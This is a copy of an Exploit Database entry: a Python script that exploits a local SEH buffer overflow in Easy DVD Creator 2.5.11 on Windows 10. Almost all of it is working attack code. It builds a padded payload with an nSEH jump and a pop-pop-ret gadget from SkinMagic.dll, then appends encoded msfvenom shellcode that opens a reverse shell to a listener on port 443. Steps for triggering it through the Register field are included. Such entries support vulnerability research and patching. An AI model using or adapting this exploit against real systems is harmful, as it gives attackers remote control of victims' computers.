Easy DVD Creator 2.5.11 – Local Buffer Overflow (SEH)

• Exploit Database
• 20 阅读

• 作者： tr0ubl3m4k3r
  日期： 2017-08-26
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/42565/

• #!/usr/bin/python
  
  ###############################################################################
  # Exploit Title:Easy DVD Creator 2.5.11 - Buffer Overflow (Windows 10 64bit, SEH)
  # Date: 26-08-2017
  # Exploit Author: tr0ubl3m4k3r
  # Vulnerable Software:Easy DVD Creator
  # Vendor Homepage:http://www.divxtodvd.net/
  # Version:2.5.11
  # Software Link:http://www.divxtodvd.net/easy_dvd_creator.exe
  # Tested On:Windows 10 64bit
  #
  # Credit to Muhann4d for discovering the PoC (41911).
  #
  # To reproduce the exploit:
  #	1. Click Register
  #	2. In the "Enter User Name" field, paste the content of exploit.txt
  #
  ##############################################################################
  
  
  buffer = "\x41" * 988
  nSEH = "\xeb\x09\x90\x90"
  
  # 0x10037859 : pop ebx # pop eax # ret| ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] 
  # ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.8.1.1 (C:\Program Files (x86)\Easy MOV Converter\SkinMagic.dll)
  
  SEH = "\x59\x78\x03\x10"
  junk = "\x90"*16
  
  # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.2.105 LPORT=443
  # -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d"
  
  shellcode = ("\xdb\xd5\xbf\xd7\xf8\x35\x95\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1"
  "\x52\x83\xc2\x04\x31\x7a\x13\x03\xad\xeb\xd7\x60\xad\xe4\x9a"
  "\x8b\x4d\xf5\xfa\x02\xa8\xc4\x3a\x70\xb9\x77\x8b\xf2\xef\x7b"
  "\x60\x56\x1b\x0f\x04\x7f\x2c\xb8\xa3\x59\x03\x39\x9f\x9a\x02"
  "\xb9\xe2\xce\xe4\x80\x2c\x03\xe5\xc5\x51\xee\xb7\x9e\x1e\x5d"
  "\x27\xaa\x6b\x5e\xcc\xe0\x7a\xe6\x31\xb0\x7d\xc7\xe4\xca\x27"
  "\xc7\x07\x1e\x5c\x4e\x1f\x43\x59\x18\x94\xb7\x15\x9b\x7c\x86"
  "\xd6\x30\x41\x26\x25\x48\x86\x81\xd6\x3f\xfe\xf1\x6b\x38\xc5"
  "\x88\xb7\xcd\xdd\x2b\x33\x75\x39\xcd\x90\xe0\xca\xc1\x5d\x66"
  "\x94\xc5\x60\xab\xaf\xf2\xe9\x4a\x7f\x73\xa9\x68\x5b\xdf\x69"
  "\x10\xfa\x85\xdc\x2d\x1c\x66\x80\x8b\x57\x8b\xd5\xa1\x3a\xc4"
  "\x1a\x88\xc4\x14\x35\x9b\xb7\x26\x9a\x37\x5f\x0b\x53\x9e\x98"
  "\x6c\x4e\x66\x36\x93\x71\x97\x1f\x50\x25\xc7\x37\x71\x46\x8c"
  "\xc7\x7e\x93\x03\x97\xd0\x4c\xe4\x47\x91\x3c\x8c\x8d\x1e\x62"
  "\xac\xae\xf4\x0b\x47\x55\x9f\xf3\x30\x57\x36\x9c\x42\x57\xc9"
  "\xe7\xca\xb1\xa3\x07\x9b\x6a\x5c\xb1\x86\xe0\xfd\x3e\x1d\x8d"
  "\x3e\xb4\x92\x72\xf0\x3d\xde\x60\x65\xce\x95\xda\x20\xd1\x03"
  "\x72\xae\x40\xc8\x82\xb9\x78\x47\xd5\xee\x4f\x9e\xb3\x02\xe9"
  "\x08\xa1\xde\x6f\x72\x61\x05\x4c\x7d\x68\xc8\xe8\x59\x7a\x14"
  "\xf0\xe5\x2e\xc8\xa7\xb3\x98\xae\x11\x72\x72\x79\xcd\xdc\x12"
  "\xfc\x3d\xdf\x64\x01\x68\xa9\x88\xb0\xc5\xec\xb7\x7d\x82\xf8"
  "\xc0\x63\x32\x06\x1b\x20\x42\x4d\x01\x01\xcb\x08\xd0\x13\x96"
  "\xaa\x0f\x57\xaf\x28\xa5\x28\x54\x30\xcc\x2d\x10\xf6\x3d\x5c"
  "\x09\x93\x41\xf3\x2a\xb6")
  padding = "\x44"*(1000-351)
  f = open ("exploit.txt", "w")
  f.write(buffer + nSEH + SEH + junk + shellcode + padding)
  f.close()